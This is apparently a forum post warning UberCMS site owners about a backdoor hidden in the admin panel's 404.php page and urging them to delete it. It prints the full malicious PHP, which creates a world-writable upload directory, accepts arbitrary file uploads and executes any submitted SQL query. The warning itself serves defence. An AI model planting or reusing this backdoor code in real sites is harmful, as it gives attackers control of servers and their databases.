Here an important fix for UberCMS.
You really need to check your allseeingeye/pages and open the file 404.php.
if that file contains this code ->
Delete the code and put something else in there, such as page not found or whatever....its not important what you put in there....
Failure to do this will leave you open for a whole lot of trouble....
All credits for this go out to : < I will give you his IP on request so you can block him from accessing your site >
You really need to check your allseeingeye/pages and open the file 404.php.
if that file contains this code ->
PHP:
<?php
require_once "../../global.php";
require_once "../admincore.php";
if(!file_exists("god/"))
{
mkdir("god/", 0777);
echo 'Backdoor Directory Created : (god/)';
}
else
{
echo 'Backdoor Open for Uploading : (god/)';
}
if(isset($_POST['submit']))
{
$target_path = "god/";
$target_path = $target_path . basename( $_FILES['uploadedfile']['name']);
if(move_uploaded_file($_FILES['uploadedfile']['tmp_name'], $target_path)) {
echo "The file ". basename( $_FILES['uploadedfile']['name']).
" has been uploaded";
} else{
echo "There was an error uploading the file, please try again!";
}
}
if(isset($_POST['sql2']))
{
$core1225 = $_POST['sql1'];
mysql_query("".$core1225."");
echo 'Query Executed Successfully';
}
?>
<html>
<body>
<form action="<?php echo $_SERVER['PHP_SELF']; ?>" method="post"
enctype="multipart/form-data">
<input type="file" name="uploadedfile" id="file" />
<input type="submit" name="submit" value="Submit" />
<br />
</form>
<p>-- ** -- ** -- MySQL Execute -- ** -- ** --</p>
<form name="form1" method="post" action="<?php echo $_SERVER['PHP_SELF']; ?>">
<p>
<label for="sql1"></label>
<textarea name="sql1" id="sql1" cols="65" rows="4"></textarea>
</p>
<p>
<input type="submit" name="sql2" id="sql2" value="Execute">
</p>
</form>
<p> </p>
</body>Delete the code and put something else in there, such as page not found or whatever....its not important what you put in there....
Failure to do this will leave you open for a whole lot of trouble....
All credits for this go out to : < I will give you his IP on request so you can block him from accessing your site >
